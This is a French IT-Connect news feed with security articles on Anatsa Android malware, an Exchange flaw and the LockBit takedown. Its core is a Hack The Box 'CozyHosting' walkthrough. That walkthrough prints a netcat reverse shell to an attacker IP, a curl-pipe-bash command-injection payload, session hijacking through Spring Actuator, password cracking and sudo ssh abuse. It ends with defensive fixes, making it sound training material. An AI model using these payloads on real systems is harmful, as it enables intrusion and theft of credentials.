À chaque fois, l'application publiée sur le Google Play Store sert d'appât et de "dropper" pour distribuer le malware sur les appareils des victimes. Il s'agit d'un processus d'infection en plusieurs étapes qui permet de contourner les mesures de protection d'Android, jusqu'à Android 13. Par exemple, la technique employée par Anatsa abuse du service d'accessibilité d'Android en prétextant la nécessité d'avoir une autorisation d'accès pour hiberner les applications gourmandes en batterie.

Les chercheurs de ThreatFabric évoquent plusieurs applications utilisées dans le cadre de ces campagnes, notamment "Phone Cleaner – File Explorer" avec environ 10 000 téléchargements, et "PDF Reader: File Manager" avec plus de 100 000 téléchargements. Au total, les différents apps cumulent plus de 150 000 téléchargements, soit autant de victimes potentielles.

Voici la liste des 5 applications utilisées :

  1. Phone Cleaner - File Explorer (com.volabs.androidcleaner)
  2. PDF Viewer - File Explorer (com.xolab.fileexplorer)
  3. PDF Reader - Viewer & Editor (com.jumbodub.fileexplorerpdfviewer)
  4. Phone Cleaner: File Explorer (com.appiclouds.phonecleaner)
  5. PDF Reader: File Manager (com.tragisoap.fileandpdfmanager)

Méfiez-vous avant d'installer des applications, même lorsque c'est sur le Play Store : lisez les avis, consultez l'historique, etc... Avant de cliquer sur le bouton "Installer".

Source

The post En Europe, le malware Anatsa a déjà infecté plus de 150 000 appareils Android first appeared on IT-Connect.

CVE-2024-21410 – Au moins 28 500 serveurs Exchange vulnérables à cette faille de sécurité exploitée !

20 février 2024 à 06:35

À l'heure où ces lignes sont écrites, il y a au moins 28 500 serveurs de messagerie Exchange vulnérables à la nouvelle faille de sécurité critique CVE-2024-21410 patchée la semaine dernière par Microsoft. En réalité, le nombre de serveurs vulnérables pourrait être beaucoup plus élevé. Faisons le point !

À l'occasion de son Patch Tuesday de Février 2024, Microsoft a corrigé 73 failles de sécurité, ainsi que plusieurs failles zero-day. C'est notamment le cas de la CVE-2024-21410, car cette vulnérabilité présente dans Microsoft Exchange Server a été exploitée par les pirates en tant que faille zero-day avant qu'elle ne soit patchée.

Associée à un score CVSS v3.1 de 9.8 sur 10, cette faille de sécurité critique permet à un attaquant non authentifié d'élever ses privilèges en s'appuyant sur une attaque par relais NTLM ciblant un serveur Microsoft Exchange vulnérable.

Comme souvent, le service de monitoring The Shadowserver a mis en ligne quelques statistiques intéressantes pour nous indiquer combien il y a de machines potentielles vulnérables. Les serveurs Exchange étant, généralement, exposés sur Internet, il est possible de les sonder et de récupérer le numéro de version.

Ainsi, sur un total de 97 000 serveurs Exchange identifiés, il y a 28 500 serveurs qui sont vulnérables à la vulnérabilité CVE-2024-21410. Pour environ 68 500 serveurs, l'état est inconnu puisque cela dépend si les administrateurs ont appliqué ou non les mesures d'atténuation. Nous pouvons imaginer que c'est le cas pour une partie des serveurs, mais pas pour tous... Ce qui augmente forcément le nombre de serveurs vulnérables.

La France, dans le Top 5

En ce qui concerne les pays avec le plus de serveurs Exchange vulnérables, The Shadowserver a publié une liste sur cette page. Voici le Top 5 :

PaysNombre d'adresses IP uniques
Allemagne22 903
États-Unis19 434
Royaume-Uni3 665
Pays-Bas3 108
France3 074

Nous savons que cette vulnérabilité est exploitée dans le cadre d'attaques. À l'heure actuelle, aucun exploit PoC public semble être disponible. Pour autant, il convient de se protéger dès que possible.

Comment se protéger ?

Sur Exchange Server 2019, vous devez installer la Cumulatice Update 14 (CU14) pour vous protéger. Pour en savoir plus sur cette vulnérabilité, et savoir comment se protéger sur les différentes versions d'Exchange Server, consultez notre article ci-dessous :

Source

The post CVE-2024-21410 – Au moins 28 500 serveurs Exchange vulnérables à cette faille de sécurité exploitée ! first appeared on IT-Connect.

Hack The Box – Résoudre la box CozyHosting : outils, méthodes et recommandations pour se protéger

20 février 2024 à 10:00

I. Présentation

Dans cet article, je vous propose la résolution de la machine Hack The Box CozyHosting, de difficulté "Facile".

Hack The Box est une plateforme en ligne qui met à disposition des systèmes vulnérables appelées "box". Chaque système est différent et doit être attaqué en adoptant la démarche d'un cyberattaquant. L'objectif est d'y découvrir les vulnérabilités qui nous permettront de compromettre les utilisateurs du système, puis le compte root ou administrateur.

Ces exercices permettent de s’entraîner légalement sur des environnements technologiques divers (Linux, Windows, Active directory, web, etc.), peuvent être utiles pour tous ceux qui travaillent dans la cybersécurité (attaquants comme défenseurs) et sont très formateurs 🙂

Je vais ici vous détailler la marche à suivre pour arriver au bout de cette box en vous donnant autant de conseils et ressources que possible. N'hésitez pas à consulter les nombreux liens qui sont présents dans l'article.

Cette solution est publiée en accord avec les règles d'HackThebox et ne sera diffusée que lorsque la box en question sera indiquée comme "Retired".

Technologies/attaques abordéesLinux, Web, Springboot, PostgreSQL, RCE (Remote Command Execution), Vol de session, sudo escape
Outils utilisésnmap, ssh, curl, nuclei, psql, johntheripper, sudo

Retrouvez tous nos articles Hack The Box via ce lien :

II. Résolution de la box CozyHosting

A. Découverte et énumération

Pour l'instant, nous ne disposons que de l'adresse IP de notre cible. Commençons par un scan réseau à l'aide de l'outil nmap pour découvrir les services exposés sur le réseau, et pourquoi pas leurs versions.

Technique d'attaque (MITRE ATT&CK) : T1046 - Network Service Discovery

$ nmap --max-retries 1 -T4 -sS -A -v --open -p- -oA nmap-TCPFullVersion 10.10.11.230  
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)

Un service SSH et un service web sont accessibles, assez classique pour le moment.

B. Configuration Springboot

Technique d'attaque (MITRE ATT&CK) : T1595 - Active Scanning: Vulnerability Scanning

Le site web exposé par le service web est un simple site vitrine :

Je commence par lancer l'outil nuclei qui va automatiser certaines tâches de découverte relatives à des CVE, framework ou mauvaises configuration spécifiques :

Le scanner web nuclei est toujours intéressant à utiliser, quelque soit votre niveau en test d'intrusion. Il est certes loin de proposer un audit complet d'une application web, mais permet de scanner vos sites web pour un diagnostic rapide et dégrossir rapidement un test d'intrusion en boite noire. Son fonctionnement par module communautaire et très complet pour un outil open source et il renvoie rarement de faux positifs.

Assez rapidement, celui-ci découvre plusieurs points d'entrées relatifs à Springboot. Il s'agit d'un projet du framework Spring qui fournit un ensemble d'outils et de conventions pour faciliter la création de services web, d'applications back-end et de microservices. Il vise à rendre le développement d'applications basées sur Spring plus rapide et facile.

Springboot Actuator est un ensemble de fonctionnalités permettant de surveiller les applications, de collecter des métriques et comprendre le trafic ou l'état de la base de données. Il s'agit plus précisément d'une dépendance utilisée par les développeurs qui utilisent ce framework de développement. Tout cela semble fort intéressant pour un développeur, mais est-ce qu'un visiteur externe a besoin d'y accéder ? La réponse est probablement non.

Technique d'attaque (MITRE ATT&CK) : T1190 - Exploit Public-Facing Application

En étudiant les possibilités et point d'entrés d'Actuator, on remarque vite qu'il peut fournir à celui qui y accède un grand nombre d'informations sur l'application qu'il gère ou le serveur qui l'héberge. Le point d'entrée "/actuator/mappings" liste tous les points d'entrés disponibles :

On remarque notamment le point d'entrée "/actuator/session", toujours intéressant pour un visiteur anonyme :

$ curl http://cozyhosting.htb/actuator/sessions
{"7DA0F441BD57DB10A6D3E7F9DC07A2B0":"kanderson","C74E35728DE7EB32CB9F8F742A68CC7A":"kanderson","C6713C8621A4A5576FD206A0E0E00B28":"kanderson","1040C845B8DF19E4DFC2415898377302":"UNAUTHORIZED"}

Sans aucune authentification et en quelques requêtes, nous parvenons à récupérer un jeton de session valide sur la plateforme ciblée.

Lors d'une authentification réussie, l'application web fournit, en échange de la preuve (mot de passe) de l’identité déclarée (login), un jeton de session. Cela évite ainsi à l'utilisateur de s'authentifier sur chaque changement de page. Ce jeton de session sera unique par utilisateur et pour chaque connexion, avec une durée de vie limitée. Ainsi, le fait de fournir cette donnée unique à chaque requête plutôt que nos identifiants, permet au serveur de suivre notre session et de nous maintenir authentifié lors de la navigation.

Sur l'application web, on remarque notamment que si l'on tente une authentification sur la page "/login", un "JSESSIONID" nous est attribué :

Le menu que vous voyez apparaitre en bas de la capture d'écran ci-dessus est la barre développeur de Firefox. Il s'agit d'un outil présent sur tous les navigateurs récents. Elle propose un ensemble d'outils intégrés permettant aux développeurs web d'inspecter et de déboguer les pages et les échanges, ainsi que d'analyser les performances du site en temps réel. Elle offre des fonctionnalités telles que l'inspection d'éléments HTML, la modification en direct du CSS, le débogage JavaScript, le suivi du réseau et la mesure des performances.

Cela nous permet d'obtenir le nom du cookie à utiliser, il faut ensuite remplacer son contenu par l'un des jetons de l’utilisateur "kanderson" récupéré plus haut.

Après modification de notre cookie, nous devons rafraichir la page pour que le serveur web comprenne que nous sommes authentifiés. Nous voilà ainsi sur le point d'entrée "/admin" en tant que l'utilisateur "K. Anderson". Nous venons d'effectuer un vol de session ! Sans connaissance du mot de passe de l'utilisateur, nous récupérons l'élément qui permet à l'application web de suivre sa session.

C. RCE (Remote Commande Execution)

Nous pouvons à présent parcourir l'espace authentifié de l'application web. Cette fonctionnalité parait notamment intéressante :

Visiblement, nous pouvons spécifier un nom d'hôte et un nom d'utilisateur pour que l'application web s'y connecte. Autre fait intéressant, si l'on saisie des données qui ne sont pas conformes à ce que pourrait attendre ce genre de fonctionnalité, le contenu de l'aide de la commande SSH est retourné par l'application web :

Cela indique explicitement qu'une commande système est exécutée à l'aide des informations que nous saisissons.

Lorsque de la réalisation d'une attaque sur une application web, la saisie de données non conformes ou mal formatées est l'une des opérations de base à réaliser. Cela permet de voir si l'application web ciblée a été correctement développée afin de gérer les entrées utilisateurs, et notamment de s'assurer que celles-ci sont conformes à ce qui est attendu d'un point de vue logique (présence de caractères spéciaux dans un nom de domaine ?) ou métier (l'adresse mail saisie existe-t-elle vraiment ? Prix négatif ?).

L'objectif de l'attaquant est alors de tenter de faire apparaitre des erreurs, parfois verbeuses, pouvant faire fuiter des informations (framework/technologie utilisée, contexte d'exécution) ou trahir un manque de filtrage ou de contrôle des entrées utilisateur.

Ainsi, nous savons à présent que nos entrées sont insérées dans une commande système (Bash), et non plus simplement dans une variable d'un langage de développement web (PHP, Java, autre) ou une base de données. C'est une information très intéressante pour un attaquant, car s'il parvient à manipuler correctement cette commande, il pourra exécuter ses propres commandes sur le système.

Supposons que nos entrées "host" et "username" soient insérées dans une commande SSH comme celle-ci :

ssh username@host

Alors, nous pourrions insérer n’importe quelle commande dans cette commande SSH à l'aide d'une variable "host" comme celle-ci :

host = 127.0.0.1;whoami
username = john
ssh john@127.0.0.1;whoami

Tentons de vérifier notre hypothèse :

Cela ne fonctionne pas, l'application web semble vérifier la cohérence du paramètre "hostname" reçu. Voyons si c'est également le cas avec le "username" :

Si l'on regarde attentivement le message d'erreur, nous comprenons qu'il s'agit en fait de deux messages distincts. Cela valide notre supposition initiale, au moins pour le paramètre "username". Voici précisément ce que donne notre injection

ssh john;[email protected]

# Détail des message d'erreurs
ssh john # ssh : Could not resolve hostname john : Temporary failure in name resolution
[email protected] # /bin/bash: line1 : [email protected]: command not found

Étant donné que nous avons inséré un caractère de chainage de commande sous Linux (le point-virgule), nous avons maintenant deux commandes. Cependant, aucune des deux n'est réellement valide. Maintenant que nous avons validé la possibilité d'une injection de commande, nous devons produire quelque chose d'utile et de fonctionnel pour un attaquant. Au moins une de nos deux commandes doit pouvoir être exécutée sans erreurs.

Technique d'attaque (MITRE ATT&CK) : T1059.004 - Command and Scripting Interpreter: Unix Shell

Je décide d'utiliser pour cela une substitution de commande, qui permet sous Linux d'utiliser le résultat d'une commande comme argument pour une autre commande :

# Poste attaquant
# Création d'un script reverse shell
$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.162 9001 >/tmp/f"   > x

# Mise en en écoute d'un service web
python3 -m http.server

# Mise en écoute d'un netcat (port 9001)
$ nc -lvp 9001

Mon idée ici est de générer le téléchargement, puis l'exécution d'un script Bash qui contient des instructions pour monter un reverse shell en direction de mon système d'attaque.

Un reverse shell est une suite d'intrusion exécutée pour qu'un système compromis se connecte à un serveur distant contrôlé par l'attaquant, permettant ainsi à ce dernier d'obtenir un accès à distance à la machine compromise. Cette technique est souvent utilisée pour contourner les pare-feu et établir une communication secrète, rarement journalisée (à l'inverse d'une connexion SSH par exemple).

Voici la requête web utilisée pour l'exploitation :

POST /executessh HTTP/1.1
Host: cozyhosting.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Origin: http://cozyhosting.htb
Connection: close
Referer: http://cozyhosting.htb/admin?error=Invalid%20hostname!
Cookie: JSESSIONID=10613C25E1495DF30F924F3A32433826
Upgrade-Insecure-Requests: 1

host=1.1.1.1&username=$(curl${IFS}http://10.10.14.162:8000/x|bash)

Ici, on voit la substitution à l'intérieur du "$( )". Le système Linux va d'abord "résoudre" cette substitution avant d'insérer le résultat de la commande dans le "username" de la commande SSH. Vous noterez également la présence d'un "${IFS}", qui permet d'insérer un espace sans utiliser l'espace. Ainsi, même si le "username" de la commande SSH est mal formaté et entraîne une erreur, la substitution sera exécutée avant et l'erreur de la commande SSH n'aura aucun impact sur mon exploitation.

Enfin, le fait d'utiliser "curl http://IP/script|bash" permet de télécharger et exécuter un script Bash sans dépôt sur le système. J'utilise cette astuce pour éviter de m'embêter avec les nombreux caractères spéciaux de ma commande reverse shell, qui peuvent être à manipuler correctement pour passer l'encodage/décodage par le client, le service et l'application web.

# Récepetion du reverse shell sur le poste attaquant
$ nc -lvp 9001
connect to [10.10.14.162] from cozyhosting.htb [10.10.11.230] 42102
app@cozyhosting:/app$ 

À présent, nous avons à notre disposition un shell interactif en tant que l'utilisateur "app" le serveur attaqué.

Nous venons de le voir, les attaque de type RCE (Remote Command Execution) sont parmi les plus critiques qui puissent exister au sein d'une application web. Elles permettent d'exécuter du code sur un serveur web qui héberge l'application web, avec les droits du service web. Ainsi, nous pouvons nous affranchir des limitations imposées par nos droits applicatifs ou les fonctionnalités de l'application.

D. Récupération d'identifiants

Nous avons un premier accès au serveur, pour aller jusqu'au bout, nous devons passer root ! Nous pouvons simplement commencer par quelques opérations de découverte basique sur le serveur :

  • Quels sont nos droits et groupes ?
app@cozyhosting:/app$ id
id
uid=1001(app) gid=1001(app) groups=1001(app)
  • Existe-t-il des services accessibles qu'en interne ?
netstat -petulan |grep "LISTEN" |grep "127.0.0"
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      102        21525      -
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      114        22278      -
tcp6       0      0 127.0.0.1:8080          :::*                    LISTEN      1001       23652      1065/java         
  • Quels fichiers intéressants pouvons-nous lire ?
app@cozyhosting:/app$ ls -al
ls -al
total 58856
drwxr-xr-x  2 root root     4096 Aug 14 14:11 .
drwxr-xr-x 19 root root     4096 Aug 14 14:11 ..
-rw-r--r--  1 root root 60259688 Aug 11 00:45 cloudhosting-0.0.1.jar
  • etc...

Technique d'attaque (MITRE ATT&CK) : T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

Après quelques recherches, je découvre le fichier "cloudhosting-0.0.1.jar", il s'agit probablement du site web qui expose le site vitrine vu précédemment. Je décide de l'exfiltrer du serveur pour étude en local :

app@cozyhosting:/app$ python3 -m http.server 8123
python3 -m http.server 8123
10.10.14.162 - "GET /cloudhosting-0.0.1.jar HTTP/1.1" 200 -

# Poste d'attaque
$ wget http://10.10.11.230:8123/cloudhosting-0.0.1.jar

Technique d'attaque (MITRE ATT&CK) : T1552.001 - Unsecured Credentials: Credentials In Files

Une archive JAR est un conteneur de fichiers Java, regroupant des classes et des ressources, facilitant le déploiement et l'exécution d'applications Java. Elle permet de compresser et d'organiser des éléments liés au code source notamment pour favoriser la portabilité et la distribution des programmes .

Une simple recherche via grep dans les fichiers composants de l'archive ".jar" nous permet de retrouver des identifiants correspondants à une base de données :

$ unzip cloudhosting-0.0.1.jar -d cloudhosting
$ grep "passw" -ri cloudhosting -C3

BOOT-INF/classes/application.properties-spring.datasource.platform=postgres   
BOOT-INF/classes/application.properties-spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting 
BOOT-INF/classes/application.properties-spring.datasource.username=postgres   
BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR 

Technique d'attaque (MITRE ATT&CK) : T1078.003 - Valid Accounts: Local Accounts

À la suite de notre découverte des services en écoute interne, nous avons identifié un service PostgreSQL. Nous pouvons probablement nous y authentifier avec les identifiants découverts :

app@cozyhosting:/app$ psql -h 127.0.0.1 -U postgres -c "\list"
psql -h 127.0.0.1 -U postgres -c "\list"
Password for user postgres: Vg&nvzAQ7XxR

Technique d'attaque (MITRE ATT&CK) : T1005 - Data from Local System

Une découverte des bases de données, tables et données accessibles nous permet de découvrir une table intéressante :

Cette table contient deux comptes utilisateur, ainsi que le hash de leur mot de passe.

select * from users;
   name    |      password      | role  
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin

Technique d'attaque (MITRE ATT&CK) : T1110.002 - Brute Force: Password Cracking

Nous utilisons à présent John The Ripper pour tenter de casser ces hash à l'aide du dictionnaire de mot de passe rockyou.txt :

$ john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt /tmp/y
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?)     

Le préfixe "$2a$" dans le contexte des hachages de mots de passe fait référence à la version "2a" de l'algorithme de hachage Blowfish utilisé avec la fonction de hachage de mots de passe bcrypt. Mais, c'est une information que John The Ripper sait traiter de façon autonome pour adapter son attaque.

Le cassage de hash de mot de passe bcrypt par dictionnaire avec John the Ripper implique l'utilisation d'une liste de mots prédéfinis (dictionnaire) pour tenter de trouver une correspondance avec les hachages bcrypt. John the Ripper génère les hachages correspondants aux mots du dictionnaire et compare ensuite avec le hash cible. Si les hashs correspondent, alors le hash est considéré comme cassé et l'on connait le mot de passe d'origine.

Bingo ! Nous parvenons à casser le hash du mot de passe de l'utilisateur "admin" !

E. Élévation du privilège sudo

Technique d'attaque (MITRE ATT&CK) : T1021.004 - Remote Services: SSH

Étant donné que nous avons un accès au serveur, nous pouvons accéder en lecture au fichier "/etc/passwd", ce qui nous permettra d'avoir une liste d'utilisateur sur lequel tester notre mot de passe :

app@cozyhosting:/app$ cat /etc/passwd |tail -n 4
cat /etc/passwd |tail -n 4
app:x:1001:1001::/home/app:/bin/sh
postgres:x:114:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
josh:x:1003:1003::/home/josh:/usr/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false

Le mot de passe découvert peut être utilisé pour se connecter en SSH avec le compte de l'utilisateur "josh" :

$ ssh [email protected]
josh@cozyhosting:~$ cat user.txt 
7d7[REDACTED]ca5d3c56

Technique d'attaque (MITRE ATT&CK) : T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Nous pouvons maintenant, entre autres, lister les dérogations d'exécution via sudo accordées à cet utilisateur :

josh@cozyhosting:~$ sudo -l
[sudo] password for josh: 
    (root) /usr/bin/ssh *

Intéressant, cet utilisateur peut exécuter la commande SSH en tant que root. Nous pouvons utiliser la ressource gtfobins.sh pour connaitre les éventuels abus existant sur cette commande : https://gtfobins.github.io/gtfobins/ssh/#sudo

Nous pouvons visiblement utiliser l'option "Proxycommand" pour exécuter une commande en tant que root. L'option ProxyCommand dans la commande SSH permet de spécifier une commande qui sera utilisée pour établir une connexion à un hôte distant. Elle est utile pour traverser un proxy/rebond avant d'atteindre la destination finale. Ici, nous utiliserons l'option pour avoir un shell interactif, encore une fois grâce à un chainage de commande :

Une fois de plus, nous parvenons à abuser de la dérogation de droit sudo pour exécuter autre chose que la commande autorisée. Cela nous permet d'obtenir les droits root sur le serveur.

III. Résumé de l'attaque

Voici une description de l'attaque réalisée en utilisant les TTP (Tactics, Techniques and Procedures) du framework MITRE ATT&CK :

TTP (MITRE ATT&CK)Détails
T1046 - Network Service DiscoveryDécouverte des services exposés avec uns can réseau via nmap
T1595 - Active Scanning: Vulnerability ScanningUtilisation de nuclei et découverte des points d'entrée SpringBoot Actuator
T1190 - Exploit Public-Facing ApplicationVol de session de l'application via Actuator
T1059.004 - Command and Scripting Interpreter: Unix ShellExploitation d'une RCE dans la fonctionnalité "/executessh" de l'espace authentifié du site vitrine et obtention d'un revershell
T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 ProtocolExfiltration de l'archive ".jar" du site vitrine via HTTP
T1552.001 - Unsecured Credentials: Credentials In FilesDécouverte d'identifiants de bases de données postgreSQL dans l'archive ".jar"
T1078.003 - Valid Accounts: Local AccountsAuthentification sur le service PostgreSQL local du système cible
T1005 - Data from Local SystemRécupération des hashs des mots de passe des utilisateurs de l'application web en base de données
T1110.002 - Brute Force: Password CrackingCassage des hashs découverts avec John The Ripper, obtention des identifiants de l'utilisateur "admin"
T1021.004 - Remote Services: SSHAuthentification SSH avec l'utilisateur "josh"
T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo CachingAbus de la dérogation de droits sudo accordée à l'utilisateur josh sur la commande SSH.

IV. Notions abordées

A. Côté attaquant

L'utilisation de nuclei nous a fait gagner un temps certains ici. Bien qu'il ne soit pas du tout recommandé de baser notre analyse et nos tests uniquement sur ce genre d'outils automatisés, il faut savoir en tirer parti, car ils présentent certains avantages. Notamment, ils peuvent rapidement tester des éléments très spécifiques autour d'une CVE (même ancienne) ou d'une mauvaise configuration. Ils peuvent aussi passer à côté de vulnérabilité très basiques qui dépendent plus du contexte applicatif. Il faut donc utiliser ces outils intelligemment...

Nous avons également vu dans cet exercice la dangerosité des vulnérabilités de type RCE (Remote Command Execution) et un exemple scolaire d'exploitation de celle-ci. Si l'on s'intéresse au code applicatif ayant mené à cette vulnérabilité (car nous avons l'archive ".jar" à présent), nous pouvons retrouver le code suivant :

Nous voyons ici l'utilisation de "Runtime.getRuntime().exec()" pour exécuter des commandes système en Java. Également, on remarque les fonctions "validateUserName", qui vérifie simplement la présence d'un espace, et "validateHost", qui repose sur une expression régulière et un pattern plus complexe (je n'ai pas précisément étudié le pattern), ce qui correspond à nos observations "boite noire" (sans le code sous les yeux).

B. Côté défenseur

Pour sécuriser ce système, nous pouvons proposer plusieurs recommandations :

Recommandation n°1 : la première recommandation est bien sûr de rendre inaccessible le point d'entrée "Actuator" aux visiteurs non authentifiés. Ce genre d'information ne doit être visibles qu'aux développeurs. Si celles-ci ne sont pas activement utilisées, il est recommandé de désactiver "Springboot Actuator" sur les environnements en production.

Recommandation n°2 : il est recommandé de renforcer la sécurité applicative, et notamment le contrôle des entrées utilisateurs sur la fonctionnalité "/executessh". La fonction "validateUsername" doit vérifier l'absence de tout caractère spécial susceptible de causer des erreurs ou d'être utilisés pour du chainage et de la substitution de commande. Des ressources de l'OWASP peuvent ici être mises en référence (OS Command Injection Defense Cheat Sheet, OWASP Testing Guide v4.2 - Testing for Command Injection). Pour prendre un peu de recul, la mise en place d'un pare-feu applicatif (WAF ou Web Application Firewall) peut également être recommandée. Celui-ci, s'il est bien configuré, permettra de freiner la démarche de l'attaquant sur les exploitations basiques telles qu'observées ici, voire de lever l'alerte auprès des équipes de sécurité.

Recommandation n°3 : la troisième recommandation porte encore une fois sur "sudo". Si non justifiée par un besoin métier, il est recommandé de supprimer la dérogation "sudo" en place, car la commande concernée peut être utilisée pour exécuter d'autres commandes avec les droits "root". Si elle est justifiée par un besoin métier, il peut être recommandé de passer un script ou un binaire (non modifiable bien entendu) qui restreindra l'utilisation des options de la commande SSH, voir contiendra uniquement quelques commandes pré-enregistrées. L'essentiel est de réduire la marge de manœuvre de l'utilisateur sur l'utilisation de la commande SSH. Le chapitre "6.3 Contrôle d'accès" du guide Recommandations de sécurité relatives à un système GNU/Linux de l'ANSSI contient un ensemble de bonnes pratiques autour de la configuration sudo.

J’espère que cet article vous a plu ! N'hésitez pas à donner votre avis dans les commentaires ou sur notre Discord!

Enfin, si vous voulez accéder à des cours et modules dédiés aux techniques offensives ou défensives et améliorer vos compétences en cybersécurité, je vous oriente vers Hack The Box Academy, utilisez ce lien d'inscription (je gagnerai quelques points 🙂 ) : Tester Hack the Box Academy

The post Hack The Box – Résoudre la box CozyHosting : outils, méthodes et recommandations pour se protéger first appeared on IT-Connect.

Ransomware : une opération internationale met à l’arrêt les serveurs de LockBit !

20 février 2024 à 10:42

Nous ne sommes qu'au mois de février, et pourtant, il pourrait déjà s'agir du coup de l'année sur la scène de la cybersécurité ! Les autorités sont parvenues à mettre hors ligne le site de LockBit, qui est probablement le gang de cybercriminels le plus actif depuis plusieurs années. Faisons le point sur cette intervention !

Depuis le 19 février 2024, le site du gang de ransomware LockBit a été mis hors ligne ! Il était utilisé par les pirates comme vitrine puisqu'il servait à publier les noms des victimes, mais également les montants des rançons et les données volées dans le cadre des attaques.

Désormais, le site de LockBit ressemble à ceci :

Site LockBit hors ligne février 2024
Source : BleepingComputer

La National Crime Agency du Royaume-Uni s'est exprimée sur le sujet : "La NCA peut confirmer que les services de LockBit ont été interrompus à la suite d'une action internationale. Il s'agit d'une opération en cours et en développement."

En effet, les forces de l'ordre et organismes de 11 pays sont à l'origine de cette opération, nommée officiellement l'opération Cronos et menée à l'internationale. En effet, la France a participé par l'intermédiaire de la Gendarmerie Nationale, mais elle n'était pas seule puisque le FBI était aussi de la partie, accompagné par l'Allemagne, le Japon, la Suède, le Canada, ou encore la Suisse.

D'après le membre LockBitSupp, qui serait à la tête de LockBit et qui s'est exprimé par l'intermédiaire du service de messagerie Tox, le FBI est parvenu à accéder aux serveurs de LockBit à l'aide d'un exploit PHP. Les forces de l'ordre sont également parvenues à mettre hors ligne l'interface dédiée aux affiliés de LockBit. Un message indique que le code source de LockBit a pu être saisi (celui du ransomware ?), ainsi que des conversations et des informations sur les victimes.

Pour rappel, le gang de ransomware LockBit est à l'origine de plusieurs grandes cyberattaques, y compris en France :

Reste à savoir quel sera l'impact réel de cette opération sur les activités malveillantes menées par le gang de cybercriminels LockBit. N'oublions pas que LockBit est une véritable organisation criminelle, très bien organisée, avec des processus clairs, etc...

Les autorités devraient s'exprimer prochainement sur le sujet. Nous pouvons les féliciter pour cet excellent travail effectué dans la lutte contre le cybercrime !

Source

The post Ransomware : une opération internationale met à l’arrêt les serveurs de LockBit ! first appeared on IT-Connect.

❌
❌